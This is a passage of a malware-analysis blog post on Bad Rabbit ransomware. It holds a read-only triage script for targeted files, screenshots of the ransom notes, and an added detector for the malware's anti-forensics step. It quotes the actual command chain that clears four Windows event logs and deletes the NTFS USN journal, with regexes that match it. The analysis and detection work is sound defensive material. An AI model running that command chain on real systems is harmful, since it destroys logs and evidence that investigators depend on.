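    ".scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk"
    ".vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip"
)
TARGET_EXTENSIONS = frozenset("." + e for e in _RAW_EXTENSIONS.split(".") if e)

# Folders in which Bad Rabbit does not encrypt files (from the post).
SKIPPED_FOLDERS = frozenset(
    f.lower() for f in ("Windows", "Program Files", "ProgramData", "AppData")
)

# Wide-char "encrypted" (UTF-16LE, 18 bytes) appended to every encrypted file.
ENCRYPTED_MARKER = "encrypted".encode("utf-16-le")


def is_in_scope(path: str) -> bool:
    """True if Bad Rabbit would have selected this (relative) path for encryption."""
    p = Path(path)
    if p.suffix.lower() not in TARGET_EXTENSIONS:
        return False
    # Assumption: a skipped folder name anywhere in the path excludes the file.
    return not any(part.lower() in SKIPPED_FOLDERS for part in p.parent.parts)


def has_encrypted_marker(path: str) -> bool:
    """True if the file ends with the UTF-16LE "encrypted" trailer."""
    size = os.path.getsize(path)
    if size < len(ENCRYPTED_MARKER):
        return False
    with open(path, "rb") as fh:
        fh.seek(size - len(ENCRYPTED_MARKER))
        return fh.read() == ENCRYPTED_MARKER


def triage(root: str) -> dict:
    """Walk `root` read-only; report in-scope files and already-marked files."""
    in_scope, marked = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            # Evaluate the path relative to the scanned root so that the
            # location of the root itself (e.g. a temp dir) does not matter.
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if is_in_scope(rel):
                in_scope.append(rel)
            if has_encrypted_marker(full):  # checked for every file, not only in-scope ones
                marked.append(rel)
    return {"in_scope": sorted(in_scope), "marked": sorted(marked)}


def build_sample_tree() -> str:
    """Create a constructed directory tree in a temp dir; returns its root."""
    root = tempfile.mkdtemp(prefix="badrabbit_triage_")
    samples = {
        "docs/report.docx": b"plain office document",              # in scope, untouched
        "docs/budget.xlsx": b"ciphertext..." + ENCRYPTED_MARKER,   # in scope, marked
        "docs/notes.txt": b"not a targeted extension",             # out of scope
        "Windows/Temp/cache.docx": b"inside a skipped folder",     # out of scope
        "users/bob/AppData/Roaming/x.pdf": b"skipped folder too",  # out of scope
    }
    for rel, content in samples.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    result = triage(build_sample_tree())
    print("in scope:", result["in_scope"])
    print("already marked:", result["marked"])
```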
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Decryption Service</span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Bad Rabbit creates a ‘DECRYPT.lnk’ shortcut on the Desktop whose execution path points to ‘dispci.exe’:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="400" src="https://lh4.googleusercontent.com/dGWkbLRAno0bXAN6FHJAK8QyeCezI4ISexa1b9jY4ah3WVib4XHiJ6K0J4MJxbInAIP-4CIF8XafNLY1qPPurLXiG1cntBtcY0FfGFNyDyjgdVUwRSUOaGQUIDQar34chyc2x5Fv" style="border: none; transform: rotate(0rad);" width="314" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Once executed, it shows the following message:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="182" src="https://lh6.googleusercontent.com/LyvtO1cKKkKX2qw9EIfkGi7alqidnFoHaueudm58SKAgIJatyC2UW7XB8rhxJ6DZuD_J-diXx1E1HOWoyNb12Cgtt59TwKCH3itXWOnB4iTIOstLYP3BDleZs-9AWhf99CQjqoq-" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="530" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When the ‘infpub.dat’ module has completed the file encryption, it shows installation key #2:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="299" src="https://lh5.googleusercontent.com/NHeGgwSxZlhr4NCzH929wlHMPk4Uewo2Uvc7uIWK27khD2dJ3cT6bZbx8QpinAAC58bT9NDWx2c4x1gW2It0EZMmHkBdg1GCihtSEl9g71yvQj588KCdNlLyuW--DBvjJW6itX30" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In the root of the C: drive, it leaves a Readme.txt with instructions and the installation key #2 needed to decrypt files:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="358" src="https://lh6.googleusercontent.com/4nUHo5HdgFYyeLMnyBrTVEaYXSvZ8VOXSpePYzv19uIKFQTj9Lk9uFrZVE_2LHFXlpzj25Iz_zujlPtpNg5NR4r1FI8kDrfiPI0AeVF6NfBPwawIKP1b4o9UARtQXk_UUrcEhxJc" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="596" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">After the scheduled reboot, the Bad Rabbit bootloader starts and locks the computer, showing installation key #1, which is needed to decrypt the volumes and unlock the boot process:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="349" src="https://lh6.googleusercontent.com/Qsia1cGeJjGCW1co8tRXVH8VdaYGRG3lH1nWnlpHM3B4pz0EHPMlmRrbCj7X5u2HBuotqYVnUbPIyHPfkDPx3xF_llg4AcBdDHdilu2cZ8E0SqWBrMS1kIB88T7fUaAnfEombR0l" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The attackers’ website is hosted in the Tor network and contains a fancy animation:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="471" src="https://lh5.googleusercontent.com/JKucmx9WqYYecfUKDdeQOixf58jEzzday7nZoXe2Ye-olIoFezB9Qk57StLZTUC6uIyZc_T5TE2dOJNKNbswsUEvRhTjvdnTIowrzEbbVw7RPnELSViggNFe4176cv1MbVrCPBIh" style="border: none; transform: rotate(0rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="252" src="https://lh3.googleusercontent.com/ThV824HD7i80EFzkbKtYbFu2e3DYD-HBs_vVatribhlJ4l2PLJfsiXZaqtm9jReOdFrq_1fHG9xF9kufKtrRpYm4XLazt06oYqDnKk76htgWQE_w8lbQxFiNtkjayIvngm8cYyNN" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_ancoUmPOG81-bzFdiodgpGy4gERpmHr4S_4u36GkrmRk1SyOUP0AdMzA1SrIx9_DM2Am1wLPjmer1SV9t-YnffjiOrwd_m-U22Y10Z7frAWVO2uShac2OhFtZXJeJflqLKRIBIyYogWT/s1600/BadRabbit.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="372" data-original-width="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_ancoUmPOG81-bzFdiodgpGy4gERpmHr4S_4u36GkrmRk1SyOUP0AdMzA1SrIx9_DM2Am1wLPjmer1SV9t-YnffjiOrwd_m-U22Y10Z7frAWVO2uShac2OhFtZXJeJflqLKRIBIyYogWT/s1600/BadRabbit.gif" /></a></div>
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Anti-Forensics</span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Similar to NotPetya, the Bad Rabbit ransomware runs the following command to wipe its own traces from the Event Log and from the NTFS USN change journal:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #444444; font-family: "arial"; font-size: 10.5pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %SYSTEMDRIVE%</span></div>
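The command above is a useful detection opportunity: clearing four event log channels in one go together with deleting the USN journal is a pattern an administrator rarely produces. The following detection logic is an added example, not code from the original post; the process-creation records it parses are constructed in a Sysmon-style pipe-separated format, and only the command line quoted in the post is real.

```python
"""
Added example, not from the original post: detection logic for the
anti-forensics chain quoted above. It parses a few constructed
process-creation records (Sysmon Event ID 1 style, pipe-separated) and
flags command lines that clear Windows event logs with wevtutil or delete
the NTFS USN change journal with fsutil. Only the command line quoted in
the post is real; hostnames, PIDs and the other records are made up.
"""
import re
from dataclasses import dataclass, field

# "wevtutil cl <channel>" or the long form "wevtutil clear-log <channel>".
WEVTUTIL_CLEAR = re.compile(
    r"\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\s+([^\s&|]+)", re.IGNORECASE
)
# "fsutil usn deletejournal ..." removes the NTFS change journal.
USN_DELETE = re.compile(r"\bfsutil(?:\.exe)?\s+usn\s+deletejournal\b", re.IGNORECASE)


@dataclass
class Finding:
    host: str
    pid: int
    channels: list = field(default_factory=list)  # event log channels cleared
    usn_deleted: bool = False
    severity: str = "none"


# Constructed sample records: timestamp|HOST=..|PID=..|PARENT=..|CMD=..
# (the constructed format guarantees that CMD itself contains no '|').
SAMPLE_LOG = [
    "2017-10-24T13:05:11Z|HOST=ws-042|PID=2210|PARENT=explorer.exe"
    "|CMD=wevtutil qe Application /c:5",
    "2017-10-24T13:06:02Z|HOST=ws-042|PID=2377|PARENT=cmd.exe"
    "|CMD=wevtutil.exe cl Application",
    "2017-10-24T13:07:40Z|HOST=ws-042|PID=3124|PARENT=rundll32.exe"
    "|CMD=cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security"
    " & wevtutil cl Application & fsutil usn deletejournal /D %SYSTEMDRIVE%",
    "2017-10-24T13:09:15Z|HOST=ws-042|PID=3301|PARENT=cmd.exe"
    "|CMD=fsutil usn queryjournal C:",
]


def parse_record(line: str) -> dict:
    """Split one pipe-separated record into a dict keyed by field name."""
    ts, *fields = line.split("|")
    rec = {"ts": ts}
    for f in fields:
        key, _, value = f.partition("=")
        rec[key] = value
    rec["PID"] = int(rec["PID"])
    return rec


def analyze(line: str):
    """Return a Finding for an anti-forensics command line, else None."""
    rec = parse_record(line)
    cmd = rec.get("CMD", "")
    channels = WEVTUTIL_CLEAR.findall(cmd)
    usn = USN_DELETE.search(cmd) is not None
    if not channels and not usn:
        return None
    # Clearing several logs in one go, or clearing logs together with the USN
    # journal, is the Bad Rabbit/NotPetya pattern; a single channel alone may
    # be an admin, so it is rated lower and left for the analyst to confirm.
    severity = "high" if (channels and usn) or len(channels) >= 3 else "medium"
    return Finding(rec["HOST"], rec["PID"], channels, usn, severity)


def scan(lines) -> list:
    """Run analyze() over every record and keep the findings in log order."""
    return [f for f in (analyze(line) for line in lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```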
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Conclusion</span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Based on the analysis above, we can state with high confidence that Bad Rabbit’s ‘infpub.dat’ module is based on the NotPetya source code and is a new version of it. Consequently, the Bad Rabbit ransomware was written by the same author, who is financially motivated in the current attack. Based on the geographical diversity of the victims reported by Kaspersky Lab, we suggest that it is not a nation-state attack. However, in the future we can expect a new version that could be used to attack the critical infrastructure of some state.</span></div>
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">References</span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The PCAP traffic and the tool to find the blacklisted process names are available on GitHub: </span><a href="https://github.com/AlexanderAda/NioGuardSecurityLab/tree/master/RansomwareAnalysis/BadRabbit" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://github.com/AlexanderAda/NioGuardSecurityLab/tree/master/RansomwareAnalysis/BadRabbit</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">More readings</span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-c5aa4db3-5f79-4189-9066-72a074c2ecb6"></span><br />
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://securelist.ru/bad-rabbit-ransomware/87771/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://securelist.ru/bad-rabbit-ransomware/87771/</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://securelist.com/bad-rabbit-ransomware/82851/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://securelist.com/bad-rabbit-ransomware/82851/</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://www.bleepingcomputer.com/news/security/bad-rabbit-ransomware-outbreak-hits-eastern-europe/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.bleepingcomputer.com/news/security/bad-rabbit-ransomware-outbreak-hits-eastern-europe/</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://blog.malwarebytes.com/threat-analysis/2017/10/badrabbit-closer-look-new-version-petyanotpetya/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://blog.malwarebytes.com/threat-analysis/2017/10/badrabbit-closer-look-new-version-petyanotpetya/</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://www.endgame.com/blog/technical-blog/badrabbit-technical-analysis" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.endgame.com/blog/technical-blog/badrabbit-technical-analysis</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://www.carbonblack.com/2017/10/24/threat-advisory-analysis-bad-rabbit-ransomware/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.carbonblack.com/2017/10/24/threat-advisory-analysis-bad-rabbit-ransomware/</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="http://www.intezer.com/notpetya-returns-bad-rabbit/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://www.intezer.com/notpetya-returns-bad-rabbit/</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://blog.fortinet.com/2017/10/25/tracking-the-bad-rabbit" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://blog.fortinet.com/2017/10/25/tracking-the-bad-rabbit</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="http://blog.talosintelligence.com/2017/10/bad-rabbit.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://blog.talosintelligence.com/2017/10/bad-rabbit.html</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://labsblog.f-secure.com/2017/10/26/following-the-bad-rabbit/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://labsblog.f-secure.com/2017/10/26/following-the-bad-rabbit/</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://bartblaze.blogspot.in/2017/10/comparing-eternalpetya-and-badrabbit.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://bartblaze.blogspot.in/2017/10/comparing-eternalpetya-and-badrabbit.html</span></a></div>
</li>
</ul>
</div>
Alexander Adamov (http://www.blogger.com/profile/10336415028200154730)

VB2017: Battlefield Ukraine (published 2017-10-02, updated 2019-06-17)
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAp303tBk_DEneYZtIIK9dhFvG1NEqKSV0i1oTBiyyYWC7tNCDafG6qQ8WD77prwTMVpAAvejzUdOMDBJZaAuTbUcK_eKbF-3tJT8gfco0z8r_RZh4baCRu9SwGd5xv4nxn-5w9SK-ANKN/s1600/VB2017_title.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="900" data-original-width="1600" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAp303tBk_DEneYZtIIK9dhFvG1NEqKSV0i1oTBiyyYWC7tNCDafG6qQ8WD77prwTMVpAAvejzUdOMDBJZaAuTbUcK_eKbF-3tJT8gfco0z8r_RZh4baCRu9SwGd5xv4nxn-5w9SK-ANKN/s640/VB2017_title.png" width="640" /></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">This summer, Ukraine unwillingly became the battlefield between hacker group(s) with supposedly Russian roots and the antivirus industry. This is not the first time Ukraine has attracted the attention of cybersecurity experts. Suffice it to recall the several waves of cyber attacks against the critical infrastructure of Ukraine using the BlackEnergy [</span><a href="https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/" style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;">1</a><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">] and Industroyer [</span><a href="https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;">2</a><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">,</span><a href="https://dragos.com/blog/crashoverride/CrashOverride-01.pdf" style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;">3</a><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">] industrial malware, supposedly created by a Russian hacker group.</span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div class="separator" style="clear: both; text-align: center;">
